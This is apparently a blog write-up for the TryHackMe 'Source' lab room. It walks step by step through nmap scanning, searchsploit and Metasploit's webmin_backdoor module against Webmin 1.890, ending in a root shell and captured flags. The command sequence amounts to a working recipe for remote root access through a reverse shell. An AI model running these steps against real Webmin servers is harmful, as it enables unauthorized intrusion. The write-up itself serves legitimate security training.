TryHackMe : Source Writeup

GrimTheRipper
4 min readSep 3, 2024

--

Created By DarkStar7471

In the ‘Source’ box on the TryHackMe platform, participants are challenged to exploit a recent vulnerability in Webmin, a widely-used web-based interface for system administration. This is a step-by-step walkthrough for the TryHackMe challenge called ‘SOURCE,’ which is a relatively easy challenge. Let’s not waste any more time and get started right away.

If you interesting click that link in the following below

https://tryhackme.com/r/room/source

Let’s start

Check connection

Ping for check connection can sending that packets can execute

ping {ip traget}

Scanning

use with a nmap for scan port and service

nmap -sV -sC -Pn {ip traget}

The command nmap -sV -sC -Pn {ip target} in Linux is used to scan the target {ip target} with the following configurations:

1. -sV: Enables version detection of the services running on the open ports of the target. Using -sV allows Nmap to determine what type of service is running on the port and its version.

2. -sC: Runs Nmap’s default scripts, which include various security checks, such as testing for common vulnerabilities, checking for open access, and potential user enumeration.

3. -Pn: Instructs Nmap to skip host discovery, meaning Nmap will not check if the host is online before scanning the ports.

4. {ip target}: The IP address of the target you want to scan.

Search for exploit

Let’s search the webmin 1.890 on searchsploit

searchsploit webmin 1.890

Metasploit

Metasploit can be used to exploit existing vulnerabilities so that is exactly

msfconsole is the command-line interface of the Metasploit Framework, which is a widely used tool for penetration testing and security assessments. Metasploit helps security testers to identify vulnerabilities in a system and conduct penetration testing.

msfconsole

find exploit for webmin service.

search webmin

webmin_backdoor seems right excellent.

use 10

next to check the available options to utilize this exploit.

options

Then configured the LHOST, RHOST. Also enabled SSL to true.

LHOST is your own IP

set LHOST tun0

RHOST is the target machine’s IP

set RHOSTS {ip traget}

And set ssl is true. SSL (Secure Sockets Layer) is a protocol used to encrypt data transmitted over the internet, ensuring secure communication between users and servers. SSL helps prevent data from being intercepted or altered by malicious actors.

set ssl true

Then I just ran exploit … and you are in the system.

run

and use command “whoami” for check user you are.

whoami

Now that you are in the system as root , let’s find the user.txt and root.txt file.

Try to looking for home directory

user.txt

next to try to looking something in root

Finally you got all FLAG!!!!

--

--

GrimTheRipper

You get the best out of others when you give the best of yourself